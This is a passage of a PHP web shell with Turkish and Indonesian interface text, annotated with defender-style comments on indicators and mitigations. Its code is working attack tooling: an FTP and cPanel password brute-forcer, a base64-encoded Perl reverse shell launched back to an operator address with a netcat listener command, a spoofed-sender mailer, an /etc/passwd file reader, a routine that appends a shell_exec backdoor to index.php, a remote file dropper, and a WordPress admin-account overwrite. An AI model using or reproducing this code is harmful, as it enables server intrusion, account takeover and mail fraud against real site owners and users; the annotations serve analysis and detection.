  2369. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
        // One HTTP Basic attempt against port 2082 over plain http. With CURLOPT_FAILONERROR set,
        // a rejected login surfaces as a cURL error, so error 0 is treated as success.
  2370. function cpanel_check($host,$user,$pass,$timeout){
  2371. $ch = curl_init();
  2372. curl_setopt($ch,CURLOPT_URL,"http://$host:2082");
  2373. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2374. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  2375. curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");
  2376. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  2377. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  2378. $data = curl_exec($ch);
  2379. if ( curl_errno($ch) == 28 ) {
  2380. print '<b> Error : Connection timed out , make confidence about validation of target !</b>';
  2381. exit;}
  2382. elseif ( curl_errno($ch) == 0 ){
  2383. print
  2384. "
  2385. <b> Saldýrý baþarýlý , bulunan kullanýcý adý , <font color='#FF0000'> $user </font> ve Þifre ,
  2386. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
  2387. if(isset($submit) &&!empty($submit)){
  2388. $userlist = explode ("
  2389. ",$users );
  2390. $passlist = explode ("
  2391. ",$pass );
  2392. print '<b> Saldýrý baþladý ...</font></b><br>';
        // Full cross product of the two lists, one connection per pair, no delay between attempts.
  2393. foreach ($userlist as $user) {
  2394. $_user = trim($user);
  2395. foreach ($passlist as $password ) {
  2396. $_pass = trim($password);
  2397. if($option == 'ftp'){
  2398. ftp_check($target,$_user,$_pass,$connect_timeout);
  2399. }
  2400. if ($option == 'cpanel')
  2401. {
  2402. cpanel_check($target,$_user,$_pass,$connect_timeout);
  2403. }
  2404. }
  2405. }
  2406. }
  2407. }
  2408. if ($_GET[id]=='bc'){
        // "Back connect" launcher: holds a base64-encoded Perl script, writes it into the directory
        // given in POST 'ppath' (form default /tmp) and starts it in the background with the POSTed
        // address and port as arguments. The form prefills the address with the requester's IP.
        // POST values are concatenated into the file path and the command line without escaping.
        // ex() and the DS constant are defined outside this part of the file.
        // Indicators: a file ending in bc_perl_enhack.pl (written with a one- or two-digit prefix
        // from rand(0,10)) in /tmp or another writable directory; a perl process owned by the
        // web-server user holding an outbound TCP connection.
        // Mitigation: default-deny egress from the web tier, process functions in
        // disable_functions. Mounting /tmp noexec does not stop `perl <file>`, because the
        // interpreter, not the script, is what gets executed.
  2409. $bc_perl='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  2410. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  2411. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  2412. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  2413. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  2414. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  2415. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==';
  2416. echo '
  2417.     <p align="center"><font size="5"><b> Back Connecting </b></font></p>
  2418.     <p align="center"><font color="black">Netcat aç bu komutu uygula:</font><i><font color="#FF0000"> nc -l -p 1542</font></i>
  2419.     </p><br>
  2420.     <div align="center"><form method="POST" action="">
  2421.     <input type="text" name="pip" value="',$_SERVER['REMOTE_ADDR'],'" class="input" /> :
  2422.     <input type="text" name="pport" size="5" value="1542" class="input" /> <br><br>
  2423.     <input type="text" name="ppath" value="/tmp" class="input" /><br><br>
  2424.     <input type="submit" value=" Connect " class="button" />
  2425.     </form></div>';
  2426. $pip=$_POST['pip'];$pport=$_POST['pport'];
  2427. if ($pip <>'') {
  2428. $fp=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl','w');
  2429. if (!$fp){
  2430. $Sonuç = 'Error: couldn\'t write file to open socket connection';
  2431. }else {
  2432. @fputs($fp,base64_decode($bc_perl));
  2433. fclose($fp);
        // The result of ex() is stored in $Sonuç but never displayed in this block.
  2434. $Sonuç = ex('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &');
  2435. }
  2436. }
  2437. }
  2438. if ($_GET[id]=='feykmail'){
        // Spoofed-sender mailer: a form for From, To, Subject, body and an optional attachment,
        // sent through PHP mail() from the compromised host. The From value is placed in the
        // header string verbatim and To/Subject are passed through unvalidated, so the sender
        // identity is entirely attacker-chosen.
        // Indicators: unexpected outbound mail from the web-server account; mail-queue entries
        // whose envelope sender and From header disagree.
        // Mitigation: enable PHP's mail.log and mail.add_x_header so messages can be traced to
        // the originating script, rate-limit or disable mail() for sites that do not need it,
        // publish SPF/DKIM/DMARC so forged From domains fail at the receiver.
  2439. echo "        <form enctype='multipart/form-data' method='POST'>
  2440.        <table>
  2441.        
  2442.        <tr><td>Yollayan Adres</td></tr>
  2443.        <tr>
  2444.        <td align='left'>
  2445.            <input type='text' name='from' />
  2446.        </td>
  2447.        </tr>
  2448.        
  2449.        <tr><td>Gidecek Adres</td></tr>
  2450.        <tr>
  2451.        <td align='left'>
  2452.            <input type='text' name='to'/>
  2453.        </td>
  2454.        </tr>
  2455.        
  2456.        <tr><td>Konu Baslik</td></tr>
  2457.        <tr>
  2458.        <td align='left'>
  2459.            <input type='text' name='subject' />
  2460.        </td>
  2461.        </tr>
  2462.        
  2463.        <tr><td>Dosya ekle</td></tr>
  2464.        <tr>
  2465.        <td align='left'>
  2466.            <input name='uploaded' type='file'/>
  2467.        </td>
  2468.        </tr>
  2469.        
  2470.        <tr><td>Mesaj</td></tr>
  2471.        <tr>
  2472.        <td align='left'>
  2473.            <TEXTAREA rows='15' cols='36' name='text'/></TEXTAREA>
  2474.        </td>
  2475.        </tr>
  2476.        
  2477.        <tr>
  2478.        <td aling='right'>
  2479.            <input type='submit' value='Gönder' name='sendamail'/>
  2480.        </td>";
  2481. if( isset($_POST['sendamail']) &&
  2482. isset($_POST['from']) &&
  2483. isset($_POST['to']) &&
  2484. isset($_POST['subject']) &&
  2485. isset($_POST['text']) )
  2486. {
  2487. $err = 'Errore invio !';
  2488. $ok  = 1;
  2489. $from    = $_POST['from'];
  2490. $to      = $_POST['to'];
  2491. $subject = $_POST['subject'];
  2492. $message = $_POST['text'];
  2493. $headers = "From: $from";
        // $uploaded_size is not assigned anywhere in this block. NOTE(review): it presumably relied
        // on register_globals; without it the attachment branch below is never entered.
  2494. if( isset( $_FILES['uploaded'] ) &&$uploaded_size )
  2495. {
  2496. $target = './uploads/';
  2497. $target = $target .basename( $_FILES['uploaded']['name'] ) .'.dat';
  2498. if($uploaded_size >350000)
  2499. {
  2500. $err = 'Allegato troppo grande (max 350 KB) !';
  2501. $ok  = 0;
  2502. }
        // The size check above does not stop the upload: the file is still moved into ./uploads/.
  2503. if( !move_uploaded_file($_FILES['uploaded']['tmp_name'],$target) )
  2504. {
  2505. $err = "Impossibile uploadare l'allegato !";
  2506. $ok  = 0;
  2507. }
  2508. else
  2509. {
  2510. $fileatt      = $target;
  2511. $fileatt_type = 'application/octet-stream';
  2512. $fileatt_name = basename( $_FILES['uploaded']['name'] );
  2513. $file = fopen($fileatt,'rb');
  2514. $data = fread($file,filesize($fileatt));
  2515. fclose($file);
        // Builds a multipart/mixed message by hand; the boundary is md5(time()).
  2516. $semi_rand     = md5(time());
  2517. $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
  2518. $headers .= "
  2519. MIME-Version: 1.0
  2520. ".
  2521. "Content-Type: multipart/mixed;
  2522. ".
  2523. " boundary=\"{$mime_boundary}\"";
        // `.=` appends to the existing body and the right-hand side also embeds $message, so the
        // original text ends up in the message twice.
  2524. $message .= "This is a multi-part message in MIME format.
  2525.  
  2526. ".
  2527. "--{$mime_boundary}
  2528. ".
  2529. "Content-Type:text/html; charset=\"iso-8859-1\"
  2530. ".
  2531. "Content-Transfer-Encoding: 7bit
  2532.  
  2533. ".
  2534. $message ."
  2535.  
  2536. ";
  2537. $data     = chunk_split(base64_encode($data));
  2538. $message .= "--{$mime_boundary}
  2539. ".
  2540. "Content-Type: {$fileatt_type};
  2541. ".
  2542. " name=\"{$fileatt_name}\"
  2543. ".
  2544. "Content-Transfer-Encoding: base64
  2545.  
  2546. ".
  2547. $data ."
  2548.  
  2549. ".
  2550. "--{$mime_boundary}--
  2551. ";
  2552. }
  2553. }
  2554. if( !$ok )
  2555. {
  2556. echo "<font color='#FF0000'><b>$err</b></font>";
  2557. @unlink($target);
  2558. }
  2559. else
  2560. {
  2561. if( @mail( $to,$subject,$message,$headers) ){
  2562. echo '<b>Email Yollandi</b>';
  2563. }
  2564. else
  2565. echo "<font color='#FF0000'><b>$err</b></font>";
        // Not part of the brace-less else above: this cleanup runs after every send attempt.
        // $target is undefined when no attachment was processed; the @ hides the resulting warning.
  2566. @unlink($target);
  2567. }
  2568. }
  2569. }
  2570. if ($_GET[id]=='command2'){
        // Local-file reader in two parts: the first form base64-encodes a path typed by the
        // operator; the second takes a base64 path in POST 'cz', decodes it and hands it to cURL
        // behind a long '../' prefix with an unusual 'file:ftp://' scheme string, printing the
        // response into a textarea. The prefilled sample value is base64 for /etc/passwd.
        // NOTE(review): the odd scheme string looks aimed at getting past a path restriction on
        // the file scheme -- confirm against the PHP/libcurl versions in use.
        // Indicators: POST field `cz` carrying base64 that decodes to an absolute path.
        // Mitigation: current PHP and libcurl, curl_* in disable_functions for untrusted sites,
        // cURL protocol allow-list limited to http/https.
  2571. echo "  <tr>
  2572.    <td width='100%' height='1'>";
  2573. if (empty($_POST['z3r'])){
  2574. echo '<form method="POST">';
  2575. echo '<input type="text" name="z3r" size="50" value="/home/hedefuser/public_html/index.php">';
  2576. echo '<input type="submit" value="Encode">';
  2577. echo '</form>';
  2578. }else{
  2579. $b4se64 =$_POST['z3r'];
  2580. $heno =base64_encode($b4se64);
  2581. echo '<p align="center">';
  2582. echo '<textarea method="POST" rows="1" cols="80" wrar="off">';
  2583. print $heno;
  2584. echo '</textarea>';
  2585. }
  2586. echo '<form method="post" /><input type="text" name="cz" size="50" value="L2V0Yy9wYXNzd2Q=" /><input type="submit" value="OK !!" /><select name=dec><option value=show>Oku</option><option value=decode>Komut</option></select></form>';
        // Brace-less if: it guards only the single statement on the next line. $dec is never
        // assigned in this block (the submitted value is read as $_POST['dec'] further down).
  2587. if( !empty($_POST['cz']) )
  2588. if ($dec=='decode'){echo '<form name=form method=POST>';}
  2589. echo "<p align=left><textarea method='POST' name='xCod' cols='60' rows='25' wrar='off' >";
  2590. $ss=$_POST['cz'];
  2591. $file = base64_decode($ss);
        // The cURL request below runs on every visit to this handler, including when 'cz' is
        // empty; CURLOPT_RETURNTRANSFER is not set, so whatever is read goes straight to the page.
  2592. if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file))) aNd emptY($file))
  2593. if ($_POST['dec']=='decode'){echo base64_encode($_POST['xCod']);}
  2594. echo '</textarea></p>';
  2595. echo '</td>
  2596. </tr>';
  2597. }
  2598. if ($_GET[a]=='reverse'){
        // Reverse-IP lookup via a third-party site: fetches the whatisonip.com page for GET 'site'
        // and prints every link target it finds. Used to list other domains on the same address.
        // Keyed on the `a` parameter, unlike the neighbouring handlers, which test `id`.
        // GET 'site' goes into the URL unencoded, and the scraped text is echoed without HTML
        // escaping, so content from the remote page is rendered as-is.
        // Indicator: outbound HTTP from the PHP worker to whatisonip.com.
  2599. $site = "$_GET[site]";
  2600. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
  2601. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
  2602. foreach($kursat[1] as $cem)
  2603. {
  2604. echo str_replace('?','',$cem).'<br>';
  2605. }
  2606. }
  2607. if ($_GET[id]=='reversem'){
        // Form-driven version of the reverse-IP lookup: POST 'site' is sent to whatisonip.com and
        // the link targets found in the reply are printed.
        // The remote fetch runs on every visit, even before the form is submitted (empty site).
        // Input is not URL-encoded and the scraped output is not HTML-escaped.
        // Indicator: outbound HTTP from the PHP worker to whatisonip.com.
  2608. echo '<br><b>http://www.</b> Koymadan yazýn <b>site.com</b> gibi ';
  2609. echo '<br><form action="" method="post">
  2610. <input type="text" name="site" />
  2611. <input type="submit" value="gönder" />
  2612. </form> ';
  2613. $site = "$_POST[site]";
  2614. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
  2615. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
  2616. foreach($kursat[1] as $cem)
  2617. {
  2618. echo str_replace('?','',$cem).'<br>';
  2619. }
  2620. }
  2621. if ($_GET[id]=='md5'){
        // Convenience utility: prints the MD5 hex digest of POST 'md5_text'. It performs no
        // action against the host.
        // The submitted word is echoed back without HTML escaping; the input's type attribute
        // ("md5_text") is not a valid HTML input type, so browsers treat it as a text field.
  2622. echo '<form method="POST">
  2623. <p><input type="md5_text" name="md5_text" id="md5_text">
  2624. <input type="submit" name="md5_send" value="make hash">
  2625. </form>';
  2626. if(isset($_POST['md5_send']))
  2627. {
  2628. if(empty($_POST['md5_text']))
  2629. {
  2630. die ('you don\'t type word for make hash');
  2631. }
  2632. $word=$_POST['md5_text'];
  2633. $word2 = md5("$word");
  2634. print("<font color='#ff0000'>$word</font> hash = <b>$word2</b>");
  2635. }
  2636. }
  2637. if ($_GET[id]=='Cmdinject'){
        // Backdoor-planting branch: appends a one-line PHP command runner to an
        // existing file named by the operator (the form text suggests index.php).
        // Defender view: the appended text is exactly the literal assigned to $CMD
        // below, so file-integrity monitoring, or a search of PHP files for a
        // trailing shell_exec() call fed from $_REQUEST, locates planted copies.
        // The precondition is that the web-server user can write to application
        // code; removing that write access, or listing shell_exec in
        // disable_functions, stops this branch from having any effect.
  2638. echo " <br>     <tr>
  2639.        <td class='td' style='border-bottom-width:thin'><form name='form3' method='post' action=''>
  2640.          Backdoorlanacak dosya :
  2641.              <INPUT NAME='IndexName' TYPE='TEXT' class='txt' size='23'>
  2642.              <input name='Submit4' type='submit' value='Inject Cmd Sheller'>
  2643.              <br><span class='txt' >Örnek : index.php</span>        
  2644.        </form></td >
  2645.      </tr>";
  2646. if (isset($_POST['Submit4']))
  2647. {
        // Target path is used exactly as posted; the error text below shows that
        // relative paths with ../ are expected, so the target may lie outside the
        // directory the shell itself lives in.
  2648. $IName = (@$_POST['IndexName']);
  2649. if ($IName == '') {
  2650. echo '<font color=red>[+] Plz Insert Index Name, For Previous Directory Use ( ../ ) Symbol .</font><Br>';
  2651. }
  2652. else {
  2653. $CMD = '<?php $cmdd=(@$_REQUEST["cmd"]); echo(shell_exec($cmdd)); ?>';
        // Mode 'a' appends, so the original file content stays intact and only the
        // file's tail and modification time change. Errors are suppressed with @;
        // the handle is not closed in this branch.
  2654. $FFP = @fopen($IName,'a');
  2655. $fWrite = @fwrite($FFP,$CMD);
  2656. if ($fWrite) {
  2657. echo '<font color=green>[+] CMD Sheller Successful Inj3cted .</font><BR>';
  2658. }
  2659. else {
  2660. echo '<font color=red>[+] No Perm !</font><BR>';
  2661. }
  2662. }
  2663. }
  2664. }
  2665. if ($_GET[id]=='uzakupload'){
        // File-drop branch with two paths: a browser upload and a server-side copy
        // from an operator-supplied source. Neither path checks file type,
        // extension or destination.
        // Defender view: new files appearing next to the shell (the copy form
        // defaults the destination name to inj.php) are the artefact to look for;
        // a document root that the web user cannot write to prevents both paths.
  2666. echo '</pre></form>';
        // Upload path: stores the first uploaded file in the current working
        // directory under the client-supplied name, then prints its name and a
        // human-readable size.
  2667. if (isset($_POST['upload'])) {$savefile = getcwd().'/'.$_FILES['file']['name']['0'];move_uploaded_file($_FILES['file']['tmp_name']['0'],$savefile);$filesizename = array(' Bytes',' KB',' MB',' GB',' TB',' PB',' EB',' ZB',' YB');$size = round($_FILES['file']['size']['0']/pow(1024,($i = floor(log($_FILES['file']['size']['0'],1024)))),2) .$filesizename[$i];print '<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>'.$_FILES['file']['name']['0'] .'</b>.<br>Size: <b>'.$size .'</b>.';}
  2668. echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>';
        // Copy path: copy() is called with both source and destination taken
        // straight from the POST body. With a URL as source this makes the server
        // itself fetch the file, which only works when allow_url_fopen is enabled.
  2669. if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text'];$newfile=$_POST['rename'];if (!copy($file,$newfile)) {echo "failed to copy $file...
  2670. ";}}
  2671. echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>';
  2672. }
  2673. if ($_GET[id]=='CloudBypass'){
        // Origin-discovery branch: resolves one of four conventional sub-domains
        // (ftp., direct-connect., webmail., cpanel.) of the entered domain with
        // gethostbyname() and prints the result as the "correct" address.
        // Defender view: this only yields something when such a record points
        // straight at the origin server instead of going through the proxy. Audit
        // DNS for records like these, and restrict the origin to accept web traffic
        // only from the proxy provider's address ranges.
  2674. echo '
  2675. <form method="POST"><br><br>
  2676. <center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass
  2677. <font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>
  2678. <select class="inputz" name="krz">
  2679.     <option>ftp</option>
  2680.         <option>direct-conntect</option>
  2681.             <option>webmail</option>
  2682.                 <option>cpanel</option>
  2683. </select>
  2684. <input class="inputz" type="text" name="target" value="url">
  2685. <input class="inputzbut" type="submit" value="Bypass"></center>
  2686.  
  2687. ';
        // $target is used unvalidated. gethostbyname() returns its argument
        // unchanged when resolution fails, so the printed value is not always an
        // IP address.
  2688. $target = $_POST['target'];
  2689. if($_POST['krz'] == 'ftp') {
  2690. $ftp = gethostbyname('ftp.'."$target");
  2691. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  2692. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
  2693. }
  2694. if($_POST['krz'] == 'direct-conntect') {
  2695. $direct = gethostbyname('direct-connect.'."$target");
  2696. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  2697. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
  2698. }
  2699. if($_POST['krz'] == 'webmail') {
  2700. $web = gethostbyname('webmail.'."$target");
  2701. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  2702. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
  2703. }
  2704. if($_POST['krz'] == 'cpanel') {
  2705. $cpanel = gethostbyname('cpanel.'."$target");
  2706. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  2707. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
  2708. }
  2709. }
  2710. if ($_GET[id]=='read'){
        // Reads /etc/named.conf into an editable textarea and, on save, writes the
        // posted text to named.txt in the current directory. The joomla branch
        // further down reads named.txt back as its list of hosted zones.
        // Defender view: named.txt next to the shell is an artefact of this step.
        // /etc/named.conf being readable by the web user is what makes it work;
        // open_basedir or tighter file permissions remove that.
  2711. echo 'read /etc/named.conf';
  2712. echo "<br /><br /><form method='post' action='?id=read&save=1'><textarea cols='80' rows='20' name='file'>";
  2713. flush();
  2714. flush();
  2715. $file = '/etc/named.conf';
  2716. $r3ad = @fopen($file,'r');
  2717. if ($r3ad){
  2718. $content = @fread($r3ad,@filesize($file));
  2719. echo ''.htmlentities($content).'';
  2720. }
        // Fallback chain. All three else-if conditions are the same test, so as
        // written only the first fallback (show_source) can run when fopen() fails;
        // the highlight_file and symlink branches are not reachable.
  2721. else if (!$r3ad)
  2722. {
  2723. $r3ad = @show_source($file) ;
  2724. }
  2725. else if (!$r3ad)
  2726. {
  2727. $r3ad = @highlight_file($file);
  2728. }
  2729. else if (!$r3ad)
  2730. {
  2731. $sm = @symlink($file,'sym.txt');
  2732. if ($sm){
  2733. $r3ad = @fopen('sym/sym.txt','r');
  2734. $content = @fread($r3ad,@filesize($file));
  2735. echo ''.htmlentities($content).'';
  2736. }
  2737. }
  2738. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
        // Save step (?id=read&save=1): the posted textarea content is written to
        // named.txt after stripcslashes(); the fopen() result is not checked.
  2739. if(isset($_GET['save'])){
  2740. $cont = stripcslashes($_POST['file']);
  2741. $f = fopen('named.txt','w');
  2742. $w = fwrite($f,$cont);
  2743. if($w){
  2744. echo '<br />Kayit tamam';
  2745. }
  2746. fclose($f);
  2747. }
        // ex($text, $a, $b): returns the part of $text that follows the first
        // occurrence of $a, cut at the next occurrence of $b. Because it is
        // declared inside this if-block, PHP defines it only when this branch
        // executes.
  2748. function ex($text,$a,$b){
  2749. $explode = explode($a,$text);
  2750. $explode = explode($b,$explode[1]);
  2751. return $explode[0];
  2752. }
  2753. }
  2754. if ($_GET[id]=='sifrele'){
        // Encoder/decoder utility for three layerings: plain base64,
        // rot13 + gzdeflate + base64, and rot13 + gzdeflate + rot13 + base64.
        // Despite the button labels these are reversible encodings, not
        // encryption. Defender view: the "Decrypt" half is the exact inverse, so
        // the same call order unwraps payloads that were packed with this tool.
  2755. $text = $_POST['code'];
  2756. echo "
  2757. <form method='post'><br><br><br>
  2758. <textarea class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
  2759. <select class='inputz' size='1' name='ope'>
  2760. <option value='base64'>Base64</option>
  2761. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  2762. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  2763. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  2764. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  2765. </form>";
        // Encode direction (button "Encrypt", POST key `submit`).
  2766. $submit = $_POST['submit'];
  2767. if (isset($submit)){
  2768. $op = $_POST['ope'];
  2769. switch ($op) {case 'base64': $codi=base64_encode($text);
  2770. break;case 'str': $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2771. break;case 'gzinflate': $codi=base64_encode(gzdeflate(str_rot13($text)));
  2772. break;default:break;}}
        // Decode direction (button "Decrypt", POST key `submits`).
  2773. $submit = $_POST['submits'];
  2774. if (isset($submit)){
  2775. $op = $_POST['ope'];
  2776. switch ($op) {case 'base64': $codi=base64_decode($text);
  2777. break;case 'str': $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2778. break;case 'gzinflate': $codi=str_rot13(gzinflate(base64_decode($text)));
  2779. break;default:break;}}
        // The result is written into the page without HTML escaping.
  2780. echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
  2781. }
  2782. if ($_GET[id]=='hash'){
        // Utility branch: prints several digests of the posted `password` value
        // (MD5, MD4, SHA-1, SHA-256, plus variants prefixed with a fixed salt).
        // No file-system or network side effects are visible in this branch.
  2783. $submit= $_POST['enter'];
  2784. if (isset($submit)) {
  2785. $pass = $_POST['password'];
        // Hard-coded salt; being a fixed literal, it can serve as a string
        // signature for this file.
  2786. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
  2787. $hash = md5($pass);
  2788. $md4 = hash('md4',$pass);
  2789. $hash_md5 = md5($salt.$pass);
  2790. $hash_md5_double = md5(sha1($salt.$pass));
  2791. $hash1 = sha1($pass);
        // NOTE(review): the SHA-256 is taken over $text, which this branch never
        // assigns, not over $pass like the other digests.
  2792. $sha256 = hash('sha256',$text);
  2793. $hash1_sha1 = sha1($salt.$pass);
  2794. $hash1_sha1_double = sha1(md5($salt.$pass));
  2795. }
        // The table is printed on every request; the values go into unquoted
        // value= attributes without HTML escaping.
  2796. echo '<form action="" method="post"><b><table class=tabnet>';
  2797. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  2798. echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
  2799. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  2800. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  2801. echo '</td></tr><br>';
  2802. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  2803. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  2804. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  2805. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
  2806. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  2807. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  2808. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  2809. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
  2810. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  2811. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  2812. }
  2813. if ($_GET[id]=='wpres'){
        // WordPress account-takeover branch: with database credentials supplied by
        // the operator it overwrites the login name and password hash of the rows
        // with ID 1, 2 and 3 in wp_users.
        // Defender view: several wp_users rows sharing one user_login and one
        // user_pass after an incident are the database-side trace of this branch.
        // Recovery means restoring those rows, rotating the database password and
        // treating every session of the affected accounts as compromised.
        // The table name is the literal wp_users, so only sites using that table
        // name are touched by this branch.
  2814. echo '<form action="?id=wpres" method="post">';
  2815. if(empty($_POST['pwd'])){
  2816. echo "<FORM method='POST'>
  2817. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
  2818. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2819. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2820. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2821. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  2822. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2823. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  2824. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  2825. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
  2826.  
  2827. <input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2828. </td></tr> </table><br><br><br><br>
  2829. ";
  2830. }else{
  2831. $localhost = $_POST['localhost'];
  2832. $database  = $_POST['database'];
  2833. $username  = $_POST['username'];
  2834. $password  = $_POST['password'];
  2835. $pwd   = $_POST['pwd'];
  2836. $admin = $_POST['admin'];
        // Uses the legacy mysql_* extension, which exists only in PHP versions
        // before 7, so this branch functions on legacy hosts only.
  2837. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2838. @mysql_select_db($database) or die(mysql_error());
  2839. $hash = crypt($pwd);
        // Statements are built by string concatenation from the posted values.
  2840. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  2841. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  2842. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  2843. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  2844. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  2845. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
        // NOTE(review): $SQL is not assigned anywhere in this branch, so this
        // statement changes the e-mail address of ID 1 to whatever that variable
        // holds at this point.
  2846. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  2847. if($a4s){
  2848. echo '<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ';
  2849. }
  2850. }
  2851. echo '
  2852.   </div>';
  2853. }
